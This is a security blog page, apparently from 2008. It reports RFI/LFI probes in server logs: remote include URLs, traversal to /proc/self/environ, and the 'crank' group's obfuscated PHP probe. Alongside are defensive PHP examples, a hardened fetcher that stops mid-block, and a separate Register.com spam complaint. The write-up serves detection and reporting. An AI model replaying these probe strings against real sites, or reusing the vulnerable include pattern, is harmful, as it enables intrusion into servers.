2008-09-12 19:13:56 GET /misc/cyberdefender/server_request.php CONFIG[gameroot]=http://www.jfc.info/jfcinfo/grafiken/i??? 80 - 195.135.183.134 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 2
2008-09-12 19:13:56 GET /misc/cyberdefender/errors.php error=http://www.jfc.info/jfcinfo/grafiken/i??? 80 - 195.135.183.134 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 2
2008-09-12 19:13:56 GET /misc/cyberdefender/server_request.php CONFIG[gameroot]=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 195.135.183.134 - mysteryfcm.co.uk 200 0 0
2008-09-12 19:13:56 GET /misc/cyberdefender/server_request.php CONFIG[gameroot]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 195.135.183.134 - mysteryfcm.co.uk 200 0 0
2008-09-12 19:13:56 GET /server_request.php CONFIG[gameroot]=http://www.jfc.info/jfcinfo/grafiken/i??? 80 - 195.135.183.134 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 2
2008-09-12 19:13:57 GET /errors.php error=http://www.jfc.info/jfcinfo/grafiken/i??? 80 - 195.135.183.134 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 2
2008-09-12 19:13:57 GET /server_request.php CONFIG[gameroot]=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 195.135.183.134 - mysteryfcm.co.uk 200 0 0
2008-09-12 19:13:57 GET /server_request.php CONFIG[gameroot]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 195.135.183.134 - mysteryfcm.co.uk 200 0 0
2008-09-12 19:13:57 GET /misc/server_request.php CONFIG[gameroot]=http://www.jfc.info/jfcinfo/grafiken/i??? 80 - 195.135.183.134 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 2
2008-09-12 19:13:57 GET /misc/errors.php error=http://www.jfc.info/jfcinfo/grafiken/i??? 80 - 195.135.183.134 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 2
2008-09-12 19:13:58 GET /misc/server_request.php CONFIG[gameroot]=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 195.135.183.134 - mysteryfcm.co.uk 200 0 0
2008-09-12 19:13:58 GET /misc/server_request.php CONFIG[gameroot]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 195.135.183.134 - mysteryfcm.co.uk 200 0 0


.. and from today's log (attacker: 83.220.144.22 - webbox442.server-home.org);


2008-09-13 02:57:02 GET /misc/cyberdefender/server_request.php CONFIG[gameroot]=http://www.jfc.info/jfcinfo/grafiken/i??? 80 - 83.220.144.22 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 2
2008-09-13 02:57:02 GET /misc/cyberdefender/errors.php error=http://www.jfc.info/jfcinfo/grafiken/i??? 80 - 83.220.144.22 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 2
2008-09-13 02:57:02 GET /misc/cyberdefender/server_request.php CONFIG[gameroot]=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 83.220.144.22 - mysteryfcm.co.uk 200 0 0
2008-09-13 02:57:02 GET /misc/cyberdefender/server_request.php CONFIG[gameroot]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 83.220.144.22 - mysteryfcm.co.uk 200 0 0
2008-09-13 02:57:02 GET /server_request.php CONFIG[gameroot]=http://www.jfc.info/jfcinfo/grafiken/i??? 80 - 83.220.144.22 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 2
2008-09-13 02:57:02 GET /errors.php error=http://www.jfc.info/jfcinfo/grafiken/i??? 80 - 83.220.144.22 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 2
2008-09-13 02:57:03 GET /server_request.php CONFIG[gameroot]=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 83.220.144.22 - mysteryfcm.co.uk 200 0 0
2008-09-13 02:57:03 GET /server_request.php CONFIG[gameroot]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 83.220.144.22 - mysteryfcm.co.uk 200 0 0
2008-09-13 02:57:03 GET /misc/server_request.php CONFIG[gameroot]=http://www.jfc.info/jfcinfo/grafiken/i??? 80 - 83.220.144.22 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 2
2008-09-13 02:57:03 GET /misc/errors.php error=http://www.jfc.info/jfcinfo/grafiken/i??? 80 - 83.220.144.22 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 2
2008-09-13 02:57:03 GET /misc/server_request.php CONFIG[gameroot]=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 83.220.144.22 - mysteryfcm.co.uk 200 0 0
2008-09-13 02:57:03 GET /misc/server_request.php CONFIG[gameroot]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 83.220.144.22 - mysteryfcm.co.uk 200 0 0


... and ....

Attacker: 193.33.20.246 (k10751109.custservers.inetgate.net)
Attacker: 85.214.58.39 (ap2000.de)


2008-09-13 00:36:34 GET /misc/cyberdefender/qlib/smarty.inc.php CONFIG[gameroot]=http://www.jfc.info/jfcinfo/grafiken/i??? 80 - 193.33.20.246 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 3
2008-09-13 00:36:34 GET /misc/cyberdefender/errors.php error=http://www.jfc.info/jfcinfo/grafiken/i??? 80 - 193.33.20.246 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 2
2008-09-13 00:36:35 GET /misc/cyberdefender/qlib/smarty.inc.php CONFIG[gameroot]=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 193.33.20.246 - mysteryfcm.co.uk 200 0 0
2008-09-13 00:36:35 GET /misc/cyberdefender/qlib/smarty.inc.php CONFIG[gameroot]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 193.33.20.246 - mysteryfcm.co.uk 200 0 0
2008-09-13 00:36:35 GET /qlib/smarty.inc.php CONFIG[gameroot]=http://www.jfc.info/jfcinfo/grafiken/i??? 80 - 193.33.20.246 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 3
2008-09-13 00:36:35 GET /errors.php error=http://www.jfc.info/jfcinfo/grafiken/i??? 80 - 193.33.20.246 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 2
2008-09-13 00:36:35 GET /qlib/smarty.inc.php CONFIG[gameroot]=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 193.33.20.246 - mysteryfcm.co.uk 200 0 0
2008-09-13 00:36:36 GET /qlib/smarty.inc.php CONFIG[gameroot]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 193.33.20.246 - mysteryfcm.co.uk 200 0 0
2008-09-13 00:36:36 GET /misc/qlib/smarty.inc.php CONFIG[gameroot]=http://www.jfc.info/jfcinfo/grafiken/i??? 80 - 193.33.20.246 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 3
2008-09-13 00:36:36 GET /misc/errors.php error=http://www.jfc.info/jfcinfo/grafiken/i??? 80 - 193.33.20.246 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 2
2008-09-13 00:36:36 GET /misc/qlib/smarty.inc.php CONFIG[gameroot]=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 193.33.20.246 - mysteryfcm.co.uk 200 0 0
2008-09-13 00:36:36 GET /misc/qlib/smarty.inc.php CONFIG[gameroot]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 193.33.20.246 - mysteryfcm.co.uk 200 0 0

2008-09-13 00:36:48 GET /misc/cyberdefender/qlib/smarty.inc.php CONFIG[gameroot]=http://www.jfc.info/jfcinfo/grafiken/i??? 80 - 85.214.58.39 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 3
2008-09-13 00:36:48 GET /misc/cyberdefender/errors.php error=http://www.jfc.info/jfcinfo/grafiken/i??? 80 - 85.214.58.39 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 2
2008-09-13 00:36:48 GET /misc/cyberdefender/qlib/smarty.inc.php CONFIG[gameroot]=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 85.214.58.39 - mysteryfcm.co.uk 200 0 0
2008-09-13 00:36:48 GET /misc/cyberdefender/qlib/smarty.inc.php CONFIG[gameroot]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 85.214.58.39 - mysteryfcm.co.uk 200 0 0
2008-09-13 00:36:48 GET /qlib/smarty.inc.php CONFIG[gameroot]=http://www.jfc.info/jfcinfo/grafiken/i??? 80 - 85.214.58.39 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 3
2008-09-13 00:36:48 GET /errors.php error=http://www.jfc.info/jfcinfo/grafiken/i??? 80 - 85.214.58.39 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 2
2008-09-13 00:36:49 GET /qlib/smarty.inc.php CONFIG[gameroot]=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 85.214.58.39 - mysteryfcm.co.uk 200 0 0
2008-09-13 00:36:49 GET /qlib/smarty.inc.php CONFIG[gameroot]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 85.214.58.39 - mysteryfcm.co.uk 200 0 0
2008-09-13 00:36:49 GET /misc/qlib/smarty.inc.php CONFIG[gameroot]=http://www.jfc.info/jfcinfo/grafiken/i??? 80 - 85.214.58.39 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 3
2008-09-13 00:36:49 GET /misc/errors.php error=http://www.jfc.info/jfcinfo/grafiken/i??? 80 - 85.214.58.39 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 2
2008-09-13 00:36:49 GET /misc/qlib/smarty.inc.php CONFIG[gameroot]=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 85.214.58.39 - mysteryfcm.co.uk 200 0 0
2008-09-13 00:36:49 GET /misc/qlib/smarty.inc.php CONFIG[gameroot]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 85.214.58.39 - mysteryfcm.co.uk 200 0 0
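Each burst above is the same three-request pattern per candidate script path: one request with CONFIG[gameroot] set to a remote URL (remote file inclusion), then two with a traversal to /proc/self/environ (local file inclusion), one with and one without a leading slash. As an added example that is not part of the original post, the PHP below scans log lines in this IIS W3C format and tags each request as RFI or LFI. The sample lines are constructed from the entries above; the field positions are an assumption read off those entries (the traversal lines carry one field fewer than the others, so the status code is taken from the end of the line rather than a fixed column).

```php
<?php
// Added example (not part of the original post): classify IIS W3C log
// lines like the ones above as RFI or LFI probes. Assumed field order,
// read off the entries above: date time method uri-stem uri-query port
// user client-ip user-agent [referer] host status substatus win32-status.

// Constructed sample: two lines copied from the entries above plus one
// ordinary request for contrast.
$sampleLog = <<<'LOG'
2008-09-12 19:13:56 GET /misc/cyberdefender/server_request.php CONFIG[gameroot]=http://www.jfc.info/jfcinfo/grafiken/i??? 80 - 195.135.183.134 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 2
2008-09-12 19:13:56 GET /misc/cyberdefender/server_request.php CONFIG[gameroot]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 195.135.183.134 - mysteryfcm.co.uk 200 0 0
2008-09-12 19:14:02 GET /index.php page=about 80 - 192.0.2.10 Mozilla/5.0+(constructed) - mysteryfcm.co.uk 200 0 0
LOG;

// Tags a query string: 'RFI' when a parameter value is itself a URL,
// 'LFI' when it traverses directories or names /proc/self/environ
// (on CGI/suPHP-style setups that file carries the request headers, so a
// User-Agent full of PHP becomes code the moment it is include()d).
function classifyQuery(string $query): array
{
    $tags = [];
    if (preg_match('#=(https?|ftp)://#i', $query)) {
        $tags[] = 'RFI';
    }
    if (preg_match('#(\.\./){2,}#', $query) || stripos($query, '/proc/self/environ') !== false) {
        $tags[] = 'LFI';
    }
    return $tags;
}

// Scans a log, one request per line; returns one record per flagged line.
// The rule keys on the request, not the status: the 404/200 outcomes above
// say nothing about whether the probe would have worked elsewhere.
function scanLog(string $log): array
{
    $hits = [];
    foreach (preg_split('/\R/', trim($log)) as $line) {
        $f = preg_split('/\s+/', trim($line));
        if (count($f) < 12 || $f[0][0] === '#') {
            continue;                       // directive line, or not this format
        }
        $tags = classifyQuery($f[4]);
        if ($tags === []) {
            continue;
        }
        $hits[] = [
            'time'   => $f[0] . ' ' . $f[1],
            'ip'     => $f[7],
            'script' => $f[3],
            'param'  => explode('=', $f[4], 2)[0],   // the parameter being abused
            'status' => $f[count($f) - 3],           // third field from the end
            'tags'   => $tags,
        ];
    }
    return $hits;
}

foreach (scanLog($sampleLog) as $h) {
    printf("%s %-16s %-7s %-45s %s (status %s)\n",
        $h['time'], $h['ip'], implode('+', $h['tags']), $h['script'], $h['param'], $h['status']);
}
```

Run it against a real log by replacing $sampleLog with file_get_contents() of the W3C file; the two probe lines are flagged and the ordinary request is not. Grouping hits by client IP and parameter name, as the records allow, is what turns a noisy log into the short attacker list given in the post.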


The RFI at the following has been reported to their host and owner;

http://www.jfc.info/jfcinfo/grafiken/i???

... and contains;


*****************************************************************
vURL Desktop Edition v0.3.4 Results
Source code for: http://www.jfc.info/jfcinfo/grafiken/i???
Server IP: 89.238.65.54 [ server1.jfc.info ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 0
iFrames: 0
Date: 13 September 2008
Time: 09:42:15:42
*****************************************************************

#####################################################################
# +------------------+ #
# | ___ | Crank #
# | _ (,~ | _ | we are crank. this is crank. #
# | (____/ |____) | #
# | ||||| ||||| | if your skilld in perl,php,c,c++ #
# | ||||| ||||| | Contact: http://cr4nk.ws #
# | |||||\ /||||| | E-Mail : cr4nk@land.ru #
# | |||'//\/\\`||| | irc.unixunited.net /join #cr4nk #
# | |' m' /\ `m `| | #
# | /||\ | Greets to our Friends #
# \_ _/ tng,asc,satyr #
# `------------' #
#####################################################################


$x0b="in\x69_\147\x65\x74"; $x0c="\163tr\x74o\154\x6fwe\x72";
echo "c\162\141\156k\x5fr\157c\x6bs";if (@$x0b("\163\x61\x66e_\x6d\157\144e") or $x0c(@$x0b("\x73a\x66\x65_m\x6fde")) == "\x6f\x6e"){echo "\123a\146\x65\155od\145\x3ao\156";}else {echo "\123a\146e\x6do\x64e:\x6ff\x66";}exit(); ?>


As documented previously, thanks to the help of the ISC, this is a vulnerability probe rather than the real payload. The escaped strings decode to ini_get, strtolower and crank_rocks: the script prints "crank_rocks", then prints "Safemode:on" or "Safemode:off" depending on PHP's safe_mode setting, and exits. Any server whose response contains "crank_rocks" has fetched and executed the remote file through the vulnerable include, so it is confirmed exploitable, and the safe_mode line tells the attacker how much the follow-up payload will be restricted.
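What the probe does can be read off without running it, since the obfuscation is nothing more than PHP's own \xHH and \OOO string escapes. The following is an added example, not the attacker's code and not code from the page: a small PHP decoder applied to the probe copied from above (minus its closing tag), followed by the include() pattern such a probe hunts for and an allow-list fix. The vulnerable function is an assumption, written the way a register_globals-era script builds an include path from $CONFIG['gameroot']; the page never shows the targeted application's source, and the file name /lib/init.php in it is hypothetical.

```php
<?php
// Added example, not from the original post. Part 1 decodes the escaped
// string literals in the probe above as data, without executing them.
// Part 2 shows the include() pattern the probe is hunting for (assumed:
// the page never shows the target's source) and a hardened replacement.

// --- Part 1: static decode of PHP double-quoted escapes (\xHH, \OOO) ---

// Decodes the body of one double-quoted PHP string the way PHP would.
function decodePhpEscapes(string $body): string
{
    return preg_replace_callback(
        '/\\\\x([0-9A-Fa-f]{1,2})|\\\\([0-7]{1,3})|\\\\([\\\\"$])/',
        function (array $m): string {
            if ($m[1] !== '') {
                return chr(hexdec($m[1]));   // \xHH
            }
            if (isset($m[2]) && $m[2] !== '') {
                return chr(octdec($m[2]));   // \OOO
            }
            return $m[3];                    // \\  \"  \$
        },
        $body
    );
}

// Pulls every double-quoted literal out of a PHP fragment and decodes it.
function decodeLiterals(string $php): array
{
    preg_match_all('/"((?:[^"\\\\]|\\\\.)*)"/', $php, $m);
    return array_map('decodePhpEscapes', $m[1]);
}

// The probe, copied from the page and held as data (never eval'd).
$probe = '$x0b="in\x69_\147\x65\x74"; $x0c="\163tr\x74o\154\x6fwe\x72";'
       . 'echo "c\162\141\156k\x5fr\157c\x6bs";if (@$x0b("\163\x61\x66e_\x6d\157\144e") or $x0c(@$x0b("\x73a\x66\x65_m\x6fde")) == "\x6f\x6e"){echo "\123a\146\x65\155od\145\x3ao\156";}else {echo "\123a\146e\x6do\x64e:\x6ff\x66";}exit();';

echo implode(', ', decodeLiterals($probe)), "\n";

// --- Part 2: the include() the probe is hunting for, and a fix ---

// ASSUMED vulnerable pattern. With register_globals on (or an equivalent
// extract($_GET)), ?CONFIG[gameroot]=http://host/i??? turns the include
// into fetch-and-run of the probe, and ../../proc/self/environ turns it
// into a read of the process environment. /lib/init.php is hypothetical.
function includePathVulnerable(array $CONFIG): string
{
    return $CONFIG['gameroot'] . '/lib/init.php';   // goes straight to include()
}

// Hardened: the root never comes from the request, the caller may only
// name an allow-listed file, and the match is exact, so no separator,
// traversal or URL scheme can get in. Pair with allow_url_include=Off.
function includePathHardened(string $root, string $name): string
{
    static $allowed = ['init.php', 'smarty.inc.php'];
    if (!in_array($name, $allowed, true)) {
        throw new InvalidArgumentException("not an allowed include: $name");
    }
    return rtrim($root, '/') . '/lib/' . $name;
}

$attack = ['gameroot' => 'http://www.jfc.info/jfcinfo/grafiken/i???'];   // from the logs above
echo "vulnerable -> ", includePathVulnerable($attack), "\n";
echo "hardened   -> ", includePathHardened('/var/www/app', 'init.php'), "\n";
try {
    includePathHardened('/var/www/app', '../../../../proc/self/environ');
} catch (InvalidArgumentException $e) {
    echo "hardened   -> rejected: ", $e->getMessage(), "\n";
}
```

Decoding statically matters: the tempting shortcut, pasting the probe into a PHP interpreter to see what it prints, runs whatever it contains. This one only echoes a marker, but the follow-up file the same gang sends to a server that answered "crank_rocks" will not be so polite.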

Domain Name: CR4NK.WS

Registrar Name: Directi Internet Solutions Pvt. Ltd. DBA PublicDomainRegistry.com
Registrar Email: tldadmin@logicboxes.com
Registrar Telephone: 832-295-1535
Registrar Whois: whois.publicdomainregistry.com

Registrant Name: See registrar info above
Registrant Email: See registrar info above

Administrative Contact Email: See registrar info above
Administrative Contact Telephone: See registrar info above

Domain Created: 2008-02-16
Domain Last Updated: 2008-02-16
Domain Currently Expires: 2009-02-16

Current Nameservers:

dns1.public-dns.net
dns2.public-dns.net
dns3.public-dns.net


Servers IP: 67.225.157.104

OrgName: Liquid Web, Inc.
OrgID: LQWB
Address: 4210 Creyts Rd.
City: Lansing
StateProv: MI
PostalCode: 48917
Country: US

ReferralServer: rwhois://rwhois.liquidweb.com:4321/

NetRange: 67.225.128.0 - 67.225.255.255
CIDR: 67.225.128.0/17
OriginAS: AS32244
NetName: LIQUIDWEB-8
NetHandle: NET-67-225-128-0-1
Parent: NET-67-0-0-0-0
NetType: Direct Allocation
NameServer: NS.LIQUIDWEB.COM
NameServer: NS1.LIQUIDWEB.COM
Comment:
RegDate: 2007-11-26
Updated: 2008-01-23

OrgAbuseHandle: ABUSE551-ARIN
OrgAbuseName: Abuse
OrgAbusePhone: +1-800-580-4985
OrgAbuseEmail: abuse@liquidweb.com

OrgTechHandle: IPADM47-ARIN
OrgTechName: IP Administrator
OrgTechPhone: +1-800-580-4985
OrgTechEmail: ipadmin@liquidweb.com


Update: Added attacks from todays server logs
Update 2: Added formatting for code div's to stop 'em going too long

Dear Register.com - STOP SPAMMING ME!

Dear Register.com,
I've contacted you before, I've tried your unsubscription links, and I've even spoken to one of your employees via your very hard-to-find online chat - I've given up. You seem intent on spamming me, irrespective of my wishes.

I first contacted Register.com last year, to report a phishing scam hosted by one of their customers. Alas their response was not what I had expected as they claimed the domain was not registered (it most certainly was, and I sent them screenshots and stuff to prove it!);

Chat Session


Discussion Thread
---------------------------------------------------------------
Response (Scott K.) - 02/09/2007 09:49 PM
Dear Steven Burn,

Thank you for contacting Register.com regarding the domain name "cheko.us".

We understand that you wish to complain about the above-mentioned domain name.

We have checked the records for the domain name and the above-mentioned domain name is available for registration. In that case the site which you have mentioned is not a phishing site.

If you have any further questions, please respond to this incident by replying, or using the link included at the beginning of this email. You can also contact a Web Services Consultant 24 hours a day, 7 days a week, at the numbers below.

Thank you for choosing Register.com, recognized for “An Outstanding Customer Service Experience” by J.D. Power and Associates.

Customer Support
Register.com, Inc.
Toll free within the U.S. and Canada: (877) 731-4441
Outside the U.S. and Canada: (902) 749-5918

For J.D. Power and Associates Certified Call Center Program(sm) information, visit www.jdpower.com or call 1-866-842-7548.

Chat Transcript - 02/08/2007 02:58 PM
Thank you for visiting Register.com's Live Support. How can I help you?
Steven: Are you still the registrar for cheko.us ????
Steven: If so, can you take it offline please as it is currently hosting a phishing scam for a UK bank
Steven: http://www.mybusinessbank.co.uk.cs07921-banking.cheko.us/confirm/sbuser/
Scott K.: Thank you for the domain name. Can I have a few minutes while I check the records for you?
Steven: no problem
Scott K.: Thanks.
Scott K.: The domain name cheko.us is registered with Register.com.
Scott K.: Do you wish to complain against this site?
Steven: I know .... thats why I came to your website
Steven: absolutely
Scott K.: Okay.
Steven: the link I gave you above goes to a phishing scam hosted on this domain name
Scott K.: Okay.
Scott K.: I would have to forward this issue to our appropriate department and they will contact regarding this.
Steven: can you tell me how long that will take please?
Steven: and of course, if you can disable the domain name in the meantime?
Scott K.: The link you have provided is not working.
Scott K.: http://www.mybusinessbank.co.uk.cs07921-banking.cheko.us/confirm/sbuser/
Steven: it's working just fine here ....
Steven: I can send you a screenshot if that will help?
Scott K.: Let me check this for you again.
Steven: no problem
Scott K.: Thanks.
Scott K.: I have checked it again.
Scott K.: It shows that the URL is invalid.
Scott K.: Please check the name again.
Steven: it is definitely not invalid as I have it visible in my browser as I write this .....
Steven: http://www.mybusinessbank.co.uk.cs07921-banking.cheko.us/confirm/sbuser/
Scott K.: Okay.
Scott K.: I have checked the URL twice but it is showing the same thing.
Steven: if you like, I can send you both a copy of the phishing e-mail, and a screenshot of the site ?????
Scott K.: Okay.
Scott K.: Can you send at register1@rcomtest.com?
Steven: No problem
Scott K.: Okay.
Scott K.: Is there anything else I can assist you with?
Steven: Sent both the e-mail, and a screenshot
Steven: nope, thats it thankyou
Scott K.: Okay.
Scott K.: Thank you for contacting Register.com.
Scott K.: Bye and have a nice day ahead.
Steven: No problem
Steven: and you
Scott K.: Thanks.
Scott K.: disconnected
Steven: disconnected

[---001:003239:51588---]


Ever since that chat session, they have insisted on sending me spam - not the best way to get new customers. I tried contacting ICANN about this, and was first told;

Dear Steve,

We will also contact this registrar. Please contact me again if you receive other spams from the same company.

Best regards,

Steve Gobin
Registrar Liaison Manager
ICANN Brussels Office
http://www.icann.org
http://www.internic.net


.... I then received more spam, and as he'd asked, I contacted him again, to which I received;

Dear Steven,

When I received your previous e-mail, I contacted Register.com in order to help you but, as I told you, that kind of problem does not come under ICANN's authority.

I therefore recommend you to report the problem to a law enforcement agency in the registrar's country or to spam-fighting associations such as Spamhaus (http://www.spamhaus.org).

Best regards,

Steve Gobin


Not really much help, is it? Contrary to the claims of the individual I spoke to on their chat session, I am not, nor have I ever been, a Register.com customer, nor have I ever given them permission to spam me (evident from the fact they send the spam to register_com@ (the address I used to report the phish) and serices@ (an address I have never used; besides anything else, it's spelt incorrectly - the "v" is missing)). The individual I spoke to also advised me that I would be removed from their mailing list, and that someone would contact me to confirm such. Alas, nothing has been received (other than the spam), and unlike last time, I didn't receive a copy of the chat session transcript either.

Thursday, 11 September 2008

More vURL Online updates

I'm happy to announce, thanks to MalwareTeks and Montana Menagerie, vURL Online now has two more servers you can choose from, making it 2 x UK and 3 x US servers :o)

The PHP script I wrote previously has also been updated, for those that would like to use it (and hopefully, offer a new vURL mirror ;o)). The new code is;

<?php
    // Query string (parse_str already URL-decodes, so urldecode() here decodes twice)
    $str = $_SERVER['QUERY_STRING'];
    parse_str(urldecode($str), $getVarArray);
    // URL to get. htmlspecialchars() only HTML-escapes the value; it does not
    // restrict where the mirror may be pointed, and it turns & into &amp;
    $urlStr = $getVarArray['url'];
    $urlStr = htmlspecialchars($urlStr, ENT_QUOTES);
    // Referer URL to use
    $refStr = $getVarArray['ref'];
    $refStr = htmlspecialchars($refStr, ENT_QUOTES);
    // User agent to pass (the requesting client's own)
    $uaStr = $_SERVER['HTTP_USER_AGENT'];

    // Get the contents: headers included, redirects followed
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_URL, $urlStr);
    curl_setopt($curl, CURLOPT_VERBOSE, 1);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($curl, CURLOPT_HEADER, 1);
    curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($curl, CURLOPT_REFERER, $refStr);
    curl_setopt($curl, CURLOPT_USERAGENT, $uaStr);
    $return = curl_exec($curl);
    curl_close($curl);
    print $return;
?>
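A mirror built from that script fetches whatever URL it is handed, for anyone who finds it, from the mirror's own IP address, and with redirects followed, so a first URL that looks harmless can bounce the fetch to 127.0.0.1 or a LAN address behind the host. As an added example, not the script from the post, the PHP below keeps the same ?url=&ref= interface but vets the target first. It assumes PHP 7.1+ with the curl extension; run from the command line it performs no network access and only exercises the checks against constructed inputs, and the DNS answers in that demo are made up.

```php
<?php
// Added example, not the script from the post: a hardened variant of the
// mirror fetcher with the same ?url=&ref= interface. Assumes PHP 7.1+ and
// the curl extension. From the CLI it does no network access at all.

const MAX_BODY = 2 * 1024 * 1024;   // cap on what is relayed back, in bytes

// Returns [host, port, ip] when $url is a public http(s) target, otherwise
// a string saying why it was refused. $resolve lets the demo swap DNS out.
function vetTarget(string $url, callable $resolve = 'gethostbyname')
{
    $p = parse_url($url);
    if ($p === false || !isset($p['scheme'])) {
        return 'unparseable URL';
    }
    $scheme = strtolower($p['scheme']);
    if ($scheme !== 'http' && $scheme !== 'https') {
        return "scheme not allowed: $scheme";       // no file://, ftp://, gopher://, ...
    }
    if (!isset($p['host'])) {
        return 'no host in URL';
    }
    if (isset($p['user']) || isset($p['pass'])) {
        return 'credentials embedded in URL';
    }
    $host = strtolower(trim($p['host'], '[]'));
    $port = $p['port'] ?? ($scheme === 'https' ? 443 : 80);
    // Resolve once, validate the address, and pin that address for the
    // fetch (CURLOPT_RESOLVE below) so a DNS rebind cannot swap it later.
    $ip = filter_var($host, FILTER_VALIDATE_IP) ? $host : $resolve($host);
    if (!filter_var($ip, FILTER_VALIDATE_IP)) {
        return "cannot resolve $host";
    }
    if (!filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE)) {
        return "private or reserved address $ip";    // loopback, RFC 1918, link-local, ...
    }
    return [$host, $port, $ip];
}

function fetch(string $url, string $referer, string $ua): string
{
    $target = vetTarget($url);
    if (is_string($target)) {
        return "REFUSED: $target\n";
    }
    [$host, $port, $ip] = $target;
    $body = '';
    $c = curl_init();
    curl_setopt_array($c, [
        CURLOPT_URL            => $url,
        CURLOPT_RESOLVE        => ["$host:$port:$ip"],             // pin the vetted address
        CURLOPT_PROTOCOLS      => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        CURLOPT_FOLLOWLOCATION => false,   // a redirect could point inward; relay it instead
        CURLOPT_HEADER         => true,
        CURLOPT_REFERER        => $referer,
        CURLOPT_USERAGENT      => $ua,
        CURLOPT_CONNECTTIMEOUT => 10,
        CURLOPT_TIMEOUT        => 30,
        // Stream the response in and abort (return 0) once it passes the cap;
        // CURLOPT_MAXFILESIZE alone only helps when Content-Length is sent.
        CURLOPT_WRITEFUNCTION  => function ($ch, string $chunk) use (&$body): int {
            $body .= $chunk;
            return strlen($body) > MAX_BODY ? 0 : strlen($chunk);
        },
    ]);
    curl_exec($c);
    $err = curl_error($c);
    curl_close($c);
    return $err === '' ? $body : $body . "\n[fetch aborted: $err]\n";
}

if (PHP_SAPI === 'cli') {
    // Offline demonstration: the resolver answers are constructed, not real DNS.
    $fakeDns = function (string $h): string {
        $table = ['www.example.com' => '93.184.216.34', 'rebind.test' => '10.0.0.5'];
        return $table[$h] ?? $h;   // gethostbyname() also returns the name on failure
    };
    $inputs = ['http://www.example.com/', 'http://127.0.0.1:8080/', 'http://169.254.169.254/latest/',
               'file:///etc/passwd', 'http://rebind.test/', 'http://user:pw@www.example.com/'];
    foreach ($inputs as $u) {
        $r = vetTarget($u, $fakeDns);
        echo str_pad($u, 36), is_string($r) ? "refused ($r)" : "ok -> {$r[2]}", "\n";
    }
} else {
    // Web entry point: show the fetched page as source, never render it.
    header('Content-Type: text/plain; charset=utf-8');
    header('X-Content-Type-Options: nosniff');
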